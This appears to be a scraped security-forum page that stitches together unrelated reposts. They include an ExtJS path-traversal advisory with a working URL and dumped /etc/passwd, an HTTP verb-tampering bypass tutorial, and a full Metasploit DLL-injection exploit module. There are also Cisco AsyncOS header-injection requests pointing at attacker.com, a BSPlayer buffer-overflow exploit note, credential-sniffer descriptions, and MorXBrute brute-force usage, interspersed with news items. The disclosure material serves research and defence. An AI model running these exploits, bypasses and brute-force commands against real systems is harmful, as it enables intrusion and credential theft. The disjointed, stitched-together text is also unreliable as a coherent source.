Search the Community

###### Info ###### Title : Beyond SQLi: Obfuscate and Bypass Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan" Team : CWH Underground [http://www.exploit-db.com/author/?a=1275] Date : 2011-10-06 ########## Contents ########## [0x00] - Introduction [0x01] - Filter Evasion (Mysql) [0x01a] - Bypass Functions and Keywords Filtering [0x01b] - Bypass Regular Expression Filtering [0x02] - Normally Bypassing Techniques [0x03] - Advanced Bypassing Techniques [0x03a] - HTTP Parameter Pollution: Split and Join [0x03b] - HTTP Parameter Contamination [0x04] - How to protect your website [0x05] - Conclusion [0x06] - References [0x07] - Greetz To #Link: https://www.exploit-db.com/papers/17934/ @Nytro, Aveti un bug pe campul tags, se completeaza automat cu mai mult de 5 taguri si nu te lasa sa postezi sau sa dai preview. E aiurea daca vrei sa formatezi un articol/tutorial.

Hi all?? Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request internal http services File: /examples/feed-viewer/feed-proxy.php line:3-line:6 $feed = $_REQUEST['feed']; if($feed != '' && strpos($feed, 'http') === 0){ header('Content-Type: text/xml'); $xml = file_get_contents($feed); When we request like this url http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1 if the resource exist,we can get internal http services info ??strpos($feed, 'http') === 0?? we can request this url to bypass the restrictions achieve arbitrary file read http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd view the HTML source code root:x:0:0:Web-useast4 root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false landscape:x:103:108::/var/lib/landscape:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash ntp:x:105:111::/home/ntp:/bin/false snmp:x:106:112::/var/lib/snmp:/bin/false statd:x:107:65534::/var/lib/nfs:/bin/false postfix:x:108:114::/var/spool/postfix:/bin/false Submitter: zhanghao@Baidu X-team gaojianfeng@Baidu X-team shitong@Baidu X-team ________________________________ Id:Yaseng Hi: Hisengberg Team: Baidu X-team E-mail:gaojianfeng@baidu.com<mailto:gedongyu@baidu.com> [tips] Source: http://dl.packetstormsecurity.net/1505-exploits/extjs-disclose.txt

What is an HTTP VERB? Hypertext transfer protocol (HTTP) gives you list of methods that can be used to perform actions on the web server. Many of these methods are designed to help developers in deploying and testing HTTP applications in development or debugging phase. These HTTP methods can be used for nefarious purposes if the web server is misconfigured. Also, some high vulnerability like Cross Site Tracing (XST), a form of cross site scripting using the server’s HTTP TRACE method, is examined. In HTTP methods, GET and POST are most commonly used by developers to access information provided by a web server. HTTP allows several other method as well, which are less known methods. Following are some of the methods: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT Many of these methods can potentially pose a critical security risk for a web application, as they allow an attacker to modify the files stored on the web server, delete the web page on the server, and upload a web shell to the server which leads to stealing the credentials of legitimate users. Moreover, when rooting the server, the methods that must be disabled are the following: PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading malicious files (e.g. an ASP or PHP file that executes commands by invoking cmd.exe), or by simply using the victim’s server as a file repository. DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a Denial of Service (DOS) attack. CONNECT: This method could allow a client to use the web server as a proxy TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes of developers. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which has been discovered by Jeremiah Grossman. If an application requires any one of the above mentioned, such as in most cases REST Web Services may require the PUT or DELETE method, it is really important to check that their configuration/usage is properly limited to trusted users and safe environment. Many web environments allow verb based authentication and access control (VBAAC). This is basically nothing but a security control using HTTP methods such as GET and POST (usually used). Let’s take an example to make you understand better. JAVA EE web XML file <security-constraint> <web-resource-<a href="http://resources.infosecinstitute.com/collection/">collection</a>> <url-pattern>/auth/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <role-name>root</role-name> </auth-constraint> </security-constraint> In the above example, the rule is limited to the /auth directory to root role only. However, this limitation can be bypasses using HTTP verb tempering even after limited/restricted access to the mentioned role. As we can see, the above mentioned configuration has only restricted the same using GET and POST methods only. We can easily bypass this with the use of the HEAD method; you can also try any other HTTP methods as well such as PUT, TRACK, TRACE, DELETE, etc. Also, you can try to bypass the same by sending arbitrary strings such as ASDF as an HTTP verb (method). Following are some conditions where bypassing is possible: It has GET functionality that is not idempotent or execute an arbitrary HTTP Method It uses a security control that lists HTTP verbs The security control fails to block HTTP methods that are not listedThese are the most common scenarios where you can bypass the same. It also depend upon rule misconfiguration. How we can bypass VBAAC with HTTP methods Using HEAD method As mentioned above, the HEAD Method is used to fetch a result similar to GET but with no response body. Imagine a URL in your application that is protected by security constraints that restrict access to the /Auth directory with GET and POST only. http://httpsecure.org/auth/root.jsp?cmd=adduser If you try to force browse to the URL in a browser, a security constraint will check the rule to see whether the requested resource and requestor are authorized or not. The first rule will check the HTTP method as it came from the browser, so it should be a GET or POST method that’s stopped by the security constraint. If you use a browser proxy such as BurpSuite to intercept the request and craft it by changing GET to HEAD method, since HEAD method is not listed in the security constraint the request willnot be blocked. So the adduser function will be successfully invoked and you will get the empty response back in the browser due to HEAD functionality. Using Arbitrary HTTP Verbs Most of the platforms allow the use of arbitrary HTTP verbs such as PHP, JAVA EE. These methods execute similar to a GET request, which enables you to bypass the same. Most importantly, using the arbitrary methods response will not be stripped as it is for the HEAD method. You can see the internal pages easily. With the using arbitrary method, instead of the HEAD method page source code can be viewed. Some Vendors Allow HEAD Verbs Many server vendors allow HEAD verbs by default, such as: APACHE 2.2.8 JBOSS 4.2.2 WEBSPERE 6.1 TOMCAT 6.0 IIS 6.0 WEBLOGIC 8.2 Allowing the HEAD method is not a vulnerability at all, as it is a requirement in the RFC. Let’s have a look at some of the most popular outdated application security mechanisms to see if we can use them to bypass VBAAC.Following are the servers which may get affected by VERB tampering techniques. JAVA EE Allow HTTP Verbs in Policy -YES Bypassing Possible – YES HEAD can be in policy – YES .htaccess Allow HTTP Verbs in Policy – YES Bypassing Possible – YES (if not set) HEAD can be in policy – YES ASP.NET Allow HTTP Verbs in Policy – YES Bypassing Possible – YES (if not set) HEAD can be in policy – YES Java EE Containers Let’s consider the following security constraint policy: <security-constraint> <display-name>Example Security Constraint Policy</display-name> <web-resource-collection> <web-resource-name>Protected Area</web-resource-name> <!-- Define the context-relative URL(s) to be protected --> <url-pattern>/auth/security/*</url-pattern> <!-- If you list http methods, only those methods are protected --> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> <http-method>GET</http-method> </web-resource-collection> ... </security-constraint> In the above mentioned code, listed methods are protected, so this rule will only trigger if a request for anything in the /auth/security directory uses a verb in the <http-method> list. The best way to implement this policy would be to block any method that is not listed, butthat is not the way these mechanisms currently behave, and you can see that the HEAD verb is not in this list. So, forwarding the HTTP HEAD request will bypass this policy entirely, and after that, the application server will pass the request to the GET handler. The right approach to secure a JAVA EE is to remove all the <http-method> elements from this policy, which simply applies this rule to all the HTTP methods, but if you still want to restrict access to specific method, then you need to setup two policies as mentioned below. <security-constraint> <web-resource-collection> <web-resource-name>site</web-resource-name> <url-pattern>/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> ... </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>site</web-resource-name> <url-pattern>/*</url-pattern> </web-resource-collection> ... </security-constraint> So, the first policy denies a GET request to access and second policy denies all. ASP.NET Authorization Let’s have a look at the ASP.NET authorization security mechanism configuration, which is vulnerable to bypass with VBAAC. <authorization> <allow verbs="POST" users="joe"/> <allow verbs="GET" users="*"/> <deny verbs="POST" users="*"/> </authorization> In the above mentioned rule, the user JOE can only submit a POST request. In this example, this cannot be bypassed, the reason being GET methods are allowed to everyone. So, there are no securities to bypass using the HEAD method. <authorization> <allow verbs="GET" users="root"/> <allow verbs="POST" users="joe"/> <deny verbs="POST,GET" users="*" /> </authorization> This one is vulnerable to bypass using HEAD method. This is possible because .Net implicitly inserts an “allow all” rule in to each authorization. After listing their role entitlements appropriately, append a “deny all” rule. <authorization> <allow verbs="GET" users="root"/> <allow verbs="POST" users="joe"/> <deny verbs="*" users="*" /> </authorization> This will ensure that the only requests that pass the authorization check are those that have a specific HTTP verb that is in the authorization rule. Some Points to remember 1) Always enable deny all option 2) Configure your web and application server to disallow HEAD requests entirely Thanks for reading References https://www.owasp.org/index.php/Test_HTTP_Methods_%28OTG-CONFIG-006%29 http://www.aspectsecurity.com/research-presentations/bypassing-vbaac-with-http-verb- tampering Source

Introduction When it comes to anonymizing activities in digital world, it can be referred to in various ways. Researchers might take it to identify various malicious activities and for back trailing, whereas hackers can anonymize their activities so as to build up a cover around their malicious activities. These anonymizing activities can really increase the work of researchers, as they can’t trust the attributes mentioned in the logs like IP address, user agent, etc. as such attributes will only give you false information. In this article series, we will learn about anonymizing activities from very basic level to an advanced level. Anonymity with TOR The Onion Router, widely known as TOR, is famous for staying anonymous on the Internet. Tor is a network of computers around the world that forward requests in an encrypted manner from the start of the request until it reaches the last machine in the network, which is known as an exit node. From the last node the TOR network, the request is decrypted and sent to the destination server. Thus exit nodes are the first nodes and last nodes in the TOR network for receiving and sending traffic from and to the original and destination server. Thus, to the destination server all traffic seems to come from the exit node in the TOR network, thus hiding the IP address of the original sender. Even the other systems in the TOR network cannot determine location either, because they are essentially forwarding traffic with no knowledge of where it actually originated. The responses to original requests will return to the system, but as far as the TOR network is concerned, a request is just another hop along the way. SOCKS server TOR works with the SOCKS protocol, so it is worth talking about SOCKS. A SOCKS server establishes a proxy TCP connection with another server on behalf of the client and then routes all the traffic back and forth between the client and the server. It works for any kind of network protocol on any port. SOCKS Version 5 adds additional support for security and UDP. The SOCKS server does not interpret the network traffic between client and server in any way, and is often used because clients are behind a firewall and are not permitted to establish TCP connections to servers outside the firewall unless they do it through the SOCKS server. Most web browsers for example can be configured to talk to a web server via a SOCKS server. Because the client must first make a connection to the SOCKS server and communicate which host it wants to connect to, the client must be “SOCKS enabled”. SOCKS uses a handshake protocol to inform the proxy software about the connection that the client is trying to make, and then acts as transparently as possible, whereas a regular proxy may interpret and rewrite headers. Comparison of SOCKS and HTTP As can be inferred from the above text about SOCKS, its function is similar to that of HTTP. But there is a significant difference between SOCKS and HTTP, as SOCKS operates at one level lower than HTTP proxying. HTTP allows forwarding TCP connections, whereas SOCKS can also forward UDP traffic and work in reverse. Let’s understand the difference with an example: SOCKS: Suppose User ‘A’ wants to connect with User ‘B’ over the Internet, but a firewall between them is restricting users to connect with each other. User ‘A’ connects to a SOCKS proxy in his network, which opens a connection through the firewall, and a communication channel between User ‘A’ and ‘B’ is achieved. HTTP: Suppose User ‘A’ wants to download a web page from web server ‘B’, but because of presence of a firewall between them, User ‘A’ is not able to do so, so User ‘A’ connects to an HTTP proxy, and in turn A’s browser communicates with the proxy in exactly the same way that it would directly with B’s server if that was possible, meaning it sends a standard HTTP request header. The HTTP proxy connects to B’s server, and then transmits back to ‘A’ any data that B’s server returns. TOR hidden services TOR is also being used to hide websites and other servers. This works by using what is called an associated onion address rather the website’s original IP address. This model is more secure than the original TOR model traffic, since hidden services do not use exit nodes. Communication is encrypted end to end. Below are some of the TOR hidden services. Search Engines: TorSearch P2P file sharing: The Pirate Bay Social Media: Facebook Commerce: Evolution, Silk Road etc. TOR weaknesses Although TOR is a strong way to anonymize activities in digital world, the TOR network has some weakness too. Below are some of the weakness that the TOR network has: The TOR network is subject to eavesdropping attack. Since the TOR model involves exit nodes and traffic from exit node to destination node is not encrypted, eavesdropping attacks are possible. One possible solution to this is to always access the HTTPS version of service. TOR exit node block: Some of the websites block traffic if the last node is a TOR node, thus reducing the functionalities for TOR users. TOR is also vulnerable to traffic analysis attack, correlation attack, sniper attack, etc. TOR configuration TOR can be easily installed in the system and after connecting with the TOR network, user can anonymize his activities. Consider the following commands to use in Ubuntu. Install TOR as root: apt-get install tor Check for IP address of the system without TOR Install TOR bundle from TOR website Extract the content and run the .exe If you are running as root, then the system might display an error by saying that “TOR cannot be run as root”. To overcome this, open the file in a text editor and comment the following lines: After this start, the TOR bundle .exe and notice the IP address. The IP address should not be the same as your machine’s IP. So in this article, we have learnt about what is TOR, how it is different from HTTP, and how easy it is to install and configure TOR in a machine. In the next article, we will learn about some more ways of anonymizing. References http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29 Source

Insecure sites relegated to Firefox Stone Age Insecure websites will be barred from using new hardware features and could have existing tools revoked, if Mozilla goes ahead with a push towards HTTPS. Webmasters that don't turn on HTTPS could be excluded from the new features list under a Mozilla initiative designed to rid the net of careless clear text gaffes, sending a "message" to developers that their web properties need to be secured, regardless of content served. Precisely which features could be held back are subject to debate, Mozilla security chief Richard Barnes says. "For example, one definition of 'new' [features] could be 'features that cannot be polyfilled'," Barnes says in a post. "That would allow things like CSS and other rendering features to still be used by insecure websites, since the page can draw effects on its own but it would still restrict qualitatively new features, such as access to new hardware capabilities. "Removing features from the non-secure web will likely cause some sites to break so we will have to monitor the degree of breakage and balance it with the security benefit." Mozilla, whose Firefox is used by a quarter of net surfers, says [PDF] existing features may be revoked but not before developers receive prior notice. The group has not yet set a date for when the "feature ban" will come into effect, but will submit proposals to the W3C WebAppSec Working Group 'soon'. It may begin with a softer slap for insecure sites - for example, by limiting the abilities of features rather than an outright block. Barnes says sites some HTTP content will be okay thanks to security features like HSTS. "It should be noted that this plan still allows for usage of the HTTP URI scheme in legacy content. With HSTS and the upgrade-insecure-requests CSP attribute, the HTTP scheme can be automatically translated to HTTPS by the browser, and thus run securely." Source

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. Sniffs URLs visited POST loads sent HTTP form logins/passwords HTTP basic auth logins/passwords HTTP searches FTP logins/passwords IRC logins/passwords POP logins/passwords IMAP logins/passwords Telnet logins/passwords SMTP logins/passwords SNMP community string NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc Kerberos SOURCE

This is a general-purpose module for exploiting conditions where a HTTP request triggers a DLL load from an specified SMB share. This Metasploit module serves payloads as DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would trigger the load of the DLL. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'Generic Web Application DLL Injection', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a HTTP request triggers a DLL load from an specified SMB share. This module serves payloads as DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would trigger the load of the DLL. }, 'Author' => [ 'Matthew Hall <hallm[at]sec-1.com>' ], 'Platform' => 'win', 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X86_64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'References' => [ ['CWE', '427'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, # Default target is 32-bit as we usually inject into 32bit processes 'DisclosureDate' => 'Mar 04 2015' )) register_options( [ OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']), OptString.new('TARGETURI', [true, 'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]) ], self.class) deregister_options('FILE_CONTENTS') end def setup super self.file_contents = generate_payload_dll self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" print_status("File available on #{unc}...") end def primer sploit = target_uri.to_s sploit << unc print_status("#{peer} - Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit }, 3) end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. Download: https://github.com/DanMcInerney/net-creds Source: https://github.com/DanMcInerney/net-creds

Am primit mesajul asta pe Steam: BookerDoit: Hi man,i want trade with you. My offer in screen:vk.cc/3vSUBs Check this, and message me if you want.thx [root@x] ~/temp $ wget http://vk.cc/3vSUBs -O dubios --2015-02-27 09:13:51-- http://vk.cc/3vSUBs Resolving vk.cc (vk.cc)... 95.213.4.230, 95.213.4.231, 95.213.4.232 Connecting to vk.cc (vk.cc)|95.213.4.230|:80... connected. HTTP request sent, awaiting response... 302 Found Location: http://goo.gl/L5YY7p [following] --2015-02-27 09:13:51-- http://goo.gl/L5YY7p Resolving goo.gl (goo.gl)... 216.58.209.206, 2a00:1450:400d:807::200e Connecting to goo.gl (goo.gl)|216.58.209.206|:80... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: https://drive.google.com/uc?export=download&id=0B0dLlCIuGBcucTkyb1Z2Z05IVEk [following] --2015-02-27 09:13:51-- https://drive.google.com/uc?export=download&id=0B0dLlCIuGBcucTkyb1Z2Z05IVEk Resolving drive.google.com (drive.google.com)... 216.58.209.206, 2a00:1450:400d:807::200e Connecting to drive.google.com (drive.google.com)|216.58.209.206|:443... connected. HTTP request sent, awaiting response... 302 Moved Temporarily Location: https://doc-0o-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/h41sk43kd5qcl4e5ue6n6jbruno0oomv/1425016800000/07539905863404628466/*/0B0dLlCIuGBcucTkyb1Z2Z05IVEk?e=download [following] Warning: wildcards not supported in HTTP. --2015-02-27 09:13:52-- https://doc-0o-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/h41sk43kd5qcl4e5ue6n6jbruno0oomv/1425016800000/07539905863404628466/*/0B0dLlCIuGBcucTkyb1Z2Z05IVEk?e=download Resolving doc-0o-08-docs.googleusercontent.com (doc-0o-08-docs.googleusercontent.com)... 216.58.209.193, 2a00:1450:400d:807::2001 Connecting to doc-0o-08-docs.googleusercontent.com (doc-0o-08-docs.googleusercontent.com)|216.58.209.193|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 911360 (890K) [application/x-dosexec] Saving to: ‘dubios’ dubios 100%[=================================================>] 890.00K --.-KB/s in 0.1s 2015-02-27 09:13:52 (7.52 MB/s) - ‘dubios’ saved [911360/911360] [root@x] ~/temp $ file dubios dubios: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows Download "dubios": http://www30.zippyshare.com/v/gj6MrMo8/file.html

Cisco Ironport AsyncOS HTTP Header Injection Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-021 Cisco Ironport SMA - AsyncOS 8.4.0-138 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2015-0624 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 20-02-2015: Vendor Advisory Release 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation of user supplied input when handling HTTP Host and X-Forwarded-Host request headers. An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a malicious website. PoC #1 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: ironport:8443:@[attacker.com] PoC #2 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: [attacker.com] PoC #3 GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Host: ironport:8443 X-Forwarded-Host: [attacker.com] References: http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE----- Source

Good news for Internet folks! Get Ready as the entire web you know is about to change. The new and long-awaited version of HTTP took a major step toward becoming a reality on Wednesday – It is been officially finalized and approved. Mark Nottingham, chairman of the Internet Engineering Task Force (IETF) working group behind creating the standards, announced in a blog post that the HTTP 2.0 specifications have been formally approved. Now, the specifications will go through a last formality – Request for comment and editorial processes – before being published as a standard. LARGEST CHANGE IN HTTP OVER LAST 16 YEARS HTTP, or Hypertext Transfer Protocol, is one of the web standards familiar to most as the http:// at the beginning of a web address. HTTP protocol governs the connections between a user’s browser and the server hosting a website, invented by the father of the web Sir Tim Berners-Lee. HTTP/2 is simply an update to the protocol, but is really a huge deal because the last time the HTTP specification was updated back in 1999. This means the HTTP/2 will be the first major update to the HTTP standard over the last 16 years, marking the largest change since 1999 when HTTP 1.1 was adopted that underpins the World Wide Web as we know it today. WHAT IS HTTP/2 ? HTTP/2 promises to deliver Web pages to browsers faster, allowing online users to read more pages, buy more things and perform more and faster Internet searches. HTTP/2 is based on SPDY protocol, a protocol introduced by Google in 2009 and adopted by some technologies including Google's own Chrome browser, Mozilla's Firefox, Microsoft's Internet Explorer, many websites such as Facebook, and some of the software that delivers Web pages to browsers. SPDY (fittingly pronounced "speedy") was designed to speed up the loading of web pages and the browsing experience of the online users. Both SPDY and HTTP/2 use "header field compression" and "multiplexing" to let browsers make multiple requests to web servers via a single connection. BROWSE EVERYTHING FASTER HTTP/2 won’t replace the traditional web standard what the world knows and loves, but it is expected to help websites load faster and more securely once it’s adopted a wide scale. PUSHES ENCRYPTION HTTP 2.0 also brings another big change – Encryption. It was originally planned to push encryption technology called TLS (Transport Layer Security, formerly called SSL for Secure Sockets) in HTTP/2, but this was rejected because of inconvenience to certain network operators and proxy vendors by burdening them with new standards. However, when Firefox and Chrome developers said that they won't support HTTP/2 unless it does support encryption. Therefore, Nottingham says, sites that want to get the benefit of faster browsing "will need to use TLS if they want to interoperate with the broadest selection of browsers." WHEN WILL USERS GET HTTP/2 ? As the specification of the HTTP/2 standard is finalized and approved, after going through some editorial processes HTTP/2 will be published and ready for adoption. Well, to enjoy HTTP/2 on Internet depends on websites, hosting services and companies such as Google to implement the standard. For its part, Google already announced that it will adopt HTTP/2 in Chrome by early 2016. Users can also expect Firefox to follow suit, as well. More information is available in the HTTP/2 FAQ. Source

# Exploit Title: Bsplayer HTTP Response BOF # Date: Jan 17 ,2015 # Exploit Author: Fady Mohamed Osman (@fady_osman) # Vendor Homepage: www.bsplayer.com # Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html # Version: current (2.68). # Tested on: Windows 7 sp1 x86 version. # Exploit-db : http://www.exploit-db.com/author/?a=2986 # Youtube : https://www.youtube.com/user/cutehack3r Exploit: http://www.exploit-db.com/sploits/35841.tar.gz Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL. In order to exploit this bug I needed to load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed that one of the dlls that matches this criteria is (MSVCR71.dll) and it's loaded when I loaded an flv file over the network and that's why I'm sending a legitimate flv file first so later we can use the loaded dll. Also the space after the seh record is pretty small so what I did is that I added a small stage shell cdoe to add offset to esp so it points at the beginning of my buffer and then a jmp esp instruction to execute the actual shellcode. -- *Regards,* Fady Osman about.me/Fady_Osman <http://about.me/Fady_Osman> Source

Description: MorXBrute is a customizable HTTP dictionary-based password cracking tool written in Perl. MorXBrute comes with a few payloads for some of the most popular softwares and additionally let you add your own payload for your favorite HTTP software or website. MorXBrute supports both GET and POST brute forcing. MorXBrute was written for educational, demonstration and testing purposes only. Author cannot be held responsible for any malicious use or damage. You can redistribute it and/or modify it under the same terms as Perl itself. Author: Simo Ben youssef <Simo_at_morxploit_dot_com> MorXploit Research Version: MorXBrute v1.01 Beta MD5: b4ea3c6895b9996b72309cc91a5910f8 Release date: November 08 2013 Download: Link 1 Link 2 Requirements: Perl 5 or older Additional modules: None Usage: perl MorXBrute.pl <target:port> <user> <wordlist> <payload file> perl MorXBrute.pl localhost:80 admin password.lst payloads/wordpressv3.7.1 perl MorXBrute.pl update Payloads: As of version 1.01 MorXBrute includes payloads for: Bitrix cPanel everyone email platform Horde Moodle Wordpress Xoops Zimbra However the goal of MorXBrute is to be a customizable HTTP brute forcing tool by giving you the ability to create your own payloads and share them with others, please read below and feel free to contact me if you need help. How to generate Payloads: Generating your own payload for your target requires a little work, right now MorXBrute can’t do that for you, but I’m considering to add a payload generator in the future. MorXBrute works by sending either a POST or GET request to the target with the login and pass and any other data as required by the target script, MorXBrute proceeds then to read the server’s response for each request. The server’s response changes just as login parameters, but in most cases, after successful authentication, the server responds with a HTTP/1.1 302 Found and redirects the browser to a new location. In this case MorXBrute uses the regex Location: (.*) to distinguish between a successful and a failed login attempt. In some other cases, some scripts like joomla will assign a cookie and redirects you to the administration page either way, before the script validates login cookie. This makes brute forcing slower and is not supported by MorXBrute. First you will need a network sniffer or if you use Google Chrome you can use the built-in network sniffer in the Developer tools (CTRL + Shift + i). Personally I prefer to use ngrep which can be downloaded from: ngrep - network grep or apt-get install ngrep on Debian/Ubuntu and yum install ngrep on Red Hat/Fedora/Centos You can then run it to capture your target traffic to analyze by running: ngrep -q -d interface -W byline host target and port 80 > target.log ngrep -q -d wlan0 -W byline host mywordpresssite.com and port 80 > wordpress.log At the login page, send two requests, one with valid login credentiels and second with false login credentiels. Once done go back and check your ngrep logs and gather the following (in wordpress example). login script path: POST /wp-login.php Or when GET is used (not in wordpress case) GET /someotherscript.php posted data log=admin&pwd=somelamepassword&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.testserver%2Fwp-admin%2F&testcookie=1 or log=admin&pwd=somelamepassword when GET is used (again not in word press case) GET /someotherscript.php?log=admin&pwd=somelamepassword on the successful login attempt log check the rest of the response headers to see if the server responded with a new location Example: Set-Cookie: wordpress_logged_in_b376718910d75b03e67817ec5d3badc4=admin%7C1563339904%7Cba04510cfb75c0a5094246a6f150baee; path=/; httponly. 